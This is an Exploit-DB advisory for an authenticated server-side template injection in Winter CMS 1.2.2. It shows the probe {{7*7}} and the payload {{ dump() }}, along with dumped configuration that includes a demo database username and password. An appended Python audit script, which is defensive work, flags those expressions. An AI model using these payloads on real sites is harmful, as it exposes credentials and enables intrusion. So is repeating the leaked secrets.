[webapps] Winter CMS 1.2.3 - Server-Side Template Injection (SSTI) (Authenticate...

source link: https://www.exploit-db.com/exploits/51893

Winter CMS 1.2.3 - Server-Side Template Injection (SSTI) (Authenticated)

EDB-ID: 51893
Platform: PHP
Date: 2024-03-16

# Exploit Title: Winter CMS 1.2.2 - Server-Side Template Injection (SSTI) (Authenticated)
# Exploit Author: tmrswrr
# Date: 12/05/2023
# Vendor: https://wintercms.com/
# Software Link: https://github.com/wintercms/winter/releases/v1.2.2
# Vulnerable Version(s): 1.2.2
# Tested on: https://www.softaculous.com/demos/WinterCMS


1) Log in with admin credentials and click CMS > Pages field > Plugin components >
    https://demos6.demo.com/WinterCMS/backend/cms#secondarytab-cmslangeditormarkup
2) Write the SSTI payload: {{7*7}}
3) Save it, then click Preview:
    https://demos6.demo.com/WinterCMS/demo/plugins
4) You will see the result:
    49
 Payload:
    {{ dump() }}
 Result:
 
        "*::database" => array:4 [▼
          "default" => "mysql"
          "connections" => array:4 [▼
            "sqlite" => array:5 [▼
              "database" => "/home/soft/public_html/WinterCMSmcviotyn9i/storage/database.sqlite"
              "driver" => "sqlite"
              "foreign_key_constraints" => true
              "prefix" => ""
              "url" => null
            ]
            "mysql" => array:15 [▼
              "charset" => "utf8mb4"
              "collation" => "utf8mb4_unicode_ci"
              "database" => "soft_pw3qsny"
              "driver" => "mysql"
              "engine" => "InnoDB"
              "host" => "localhost"
              "options" => []
              "password" => "8QSz9(pT)3"
              "port" => 3306
              "prefix" => ""
              "prefix_indexes" => true
              "strict" => true
              "unix_socket" => ""
              "url" => null
              "username" => "soft_pw3qsny"
            ]
            "pgsql" => array:12 [▶]
            "sqlsrv" => array:10 [▶]
          ]
          "migrations" => "migrations"
          "redis" => array:4 [▼
            "client" => "phpredis"
            "options" => array:2 [▼
              "cluster" => "redis"
              "prefix" => "winter_database_"
            ]
            "default" => array:5 [▼
              "database" => "0"
              "host" => "127.0.0.1"
              "password" => null
              "port" => "6379"
              "url" => null
            ]
            "cache" => array:5 [▼
              "database" => "1"
              "host" => "127.0.0.1"
              "password" => null
              "port" => "6379"
              "url" => null
            ]
          ]
        ]
      ]
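
The following is an added example, not part of the original advisory and not Winter CMS code: a small audit of stored page markup that flags the two expressions used above. It assumes the Winter CMS template layout in which sections are separated by `==` lines; the allowlist, rule names and sample page are constructed for illustration.

```python
import re

# Assumed site policy (not from Winter CMS): functions authors may call in markup.
ALLOWED_FUNCTIONS = {"date", "range", "url"}
# Twig words that may legally precede "(" without being a function call (partial list).
TWIG_KEYWORDS = {"if", "elseif", "and", "or", "not", "in", "is"}

TWIG_BLOCK = re.compile(r"\{\{(.*?)\}\}|\{%(.*?)%\}", re.S)
STRING = re.compile(r"'[^']*'|\"[^\"]*\"")
CALL = re.compile(r"(?<![.|\w])([A-Za-z_]\w*)\s*\(")  # skips .method( and |filter(
CONSTANT_MATH = re.compile(r"^[\d\s+\-*/%().]*[+\-*/%][\d\s+\-*/%().]*$")

# Constructed sample page: settings section, "==" separator, then Twig markup.
SAMPLE_PAGE = '''title = "Plugins"
url = "/plugins"
==
<h1>{{ this.page.title }}</h1>
{{7*7}}
{{ dump() }}
{% for n in range(1, 3) %}{{ n }}{% endfor %}
'''


def twig_section(template):
    """Return the markup section: whatever follows the last of up to two '==' lines."""
    return re.split(r"^==\s*$", template, maxsplit=2, flags=re.M)[-1]


def audit(template):
    """Return (rule, expression) pairs for markup that breaks the policy."""
    findings = []
    for m in TWIG_BLOCK.finditer(twig_section(template)):
        expr = (m.group(1) or m.group(2) or "").strip()
        bare = STRING.sub("''", expr)                 # ignore string literal contents
        bare = re.sub(r"\s*([.|])\s*", r"\1", bare)   # "x | f(" -> "x|f("
        # Printing pure arithmetic is rarely legitimate in a page; it is the usual SSTI probe.
        if m.group(1) is not None and CONSTANT_MATH.match(bare):
            findings.append(("constant-arithmetic", expr))
        for name in CALL.findall(bare):
            if name not in ALLOWED_FUNCTIONS | TWIG_KEYWORDS:
                findings.append(("function-not-allowed:" + name, expr))
    return findings


if __name__ == "__main__":
    for rule, expr in audit(SAMPLE_PAGE):
        print(rule, "->", expr)
```

Run against theme page files on save or in review, this reports both `{{7*7}}` and `{{ dump() }}` while leaving ordinary output and the allowlisted `range()` loop alone.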
            
